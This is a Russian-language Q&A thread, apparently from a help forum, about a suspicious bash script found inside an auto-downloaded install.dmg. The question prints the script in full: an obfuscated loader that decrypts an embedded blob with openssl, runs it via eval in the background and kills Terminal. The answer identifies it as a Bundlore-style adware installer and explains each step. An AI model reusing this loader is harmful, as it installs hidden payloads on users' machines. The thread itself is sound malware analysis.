Насколько вредна эта команда?

Question

#!/bin/bash
A="a";C="c";D="d";E="e";L="l";M="m";N="n";O="o";P="p";S="s";
export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX19PirpiUvZVXJURbVDsu4fckJoMWR7UHtP5ORyLB+dz/Kl5hJixSJLItUpkynZbcVxd98nfHH3xJwRWWkgAPynQTGNsqO2MKLHIGjQrJIsibmDRd13M8tvC14MkiKVa9SJAewH/NkHjfSMw0Ml5VbfJ7VMepYBlG5XfxqJ+wAdjfU+LiQqNEcrHKJr+Zoe33HEaCL3SWtYFSwOvUy9m8nUasOujyTPoMtNZhccr7ZRcjOyH9D6s2MHxK9UREQ8hHVugcmcEqDzJag8KWPFTKA+9YWp++/WzSQnFsHb9mT4HXqWdHfnW+3h9'
decryptedCommand="$(echo -e "$commandArgs" | ${O}${P}${E}${N}${S}${S}${L} ${E}${N}${C} -${A}${E}${S}-256-cbc -${D} -A -b${A}${S}${E}64 -${P}${A}${S}${S} "${P}${A}${S}${S}:$archive")"
nohup /bin/bash -c "eval \"$decryptedCommand\"" >/dev/null 2>&1 &
killall Terminal 

Я получил это из автоматически загруженного теневого файла install.dmg. Я, очевидно, не запускал это, поэтому подумал, что могу спросить вас, ребята.

Answer 1

Краткий ответ: НЕ запускать. Убейте его огнем, если вы не хотите анализировать его как вредоносное ПО.

Это запутанный скрипт установщика вредоносного ПО. Сам сценарий довольно общий c, но в том же каталоге есть еще один (зашифрованный) файл, который является реальной полезной нагрузкой, и почти наверняка это вредоносная программа. На самом деле это похоже на почти точное совпадение с go, на которое я смотрел некоторое время. Вот результаты сканирования VirusTotal для этого, что предполагает, что это коллекция рекламного ПО Bundlore .

Пояснение: если это соответствует тому, что я смотрел ранее, рядом с этим скриптом есть еще один файл с именем «2P1zsqQ». Это имя файла используется в качестве пароля для расшифровки строки commandArgs в командную строку оболочки, в которой есть инструкции для расшифровки самого файла 2P1zsqQ (с тем же паролем), что и /tmp/<somethingrandom>/Qqsz1P2, запуска этого (расшифрованного) исполняемого файла, а затем удаления это (в то время как этот сценарий убивает приложение Терминал, тем самым скрывая, что происходит).

Кстати, этот вопрос касается аналогичного скрипта установщика вредоносных программ; возможно, более ранняя версия с немного меньшей обфускацией.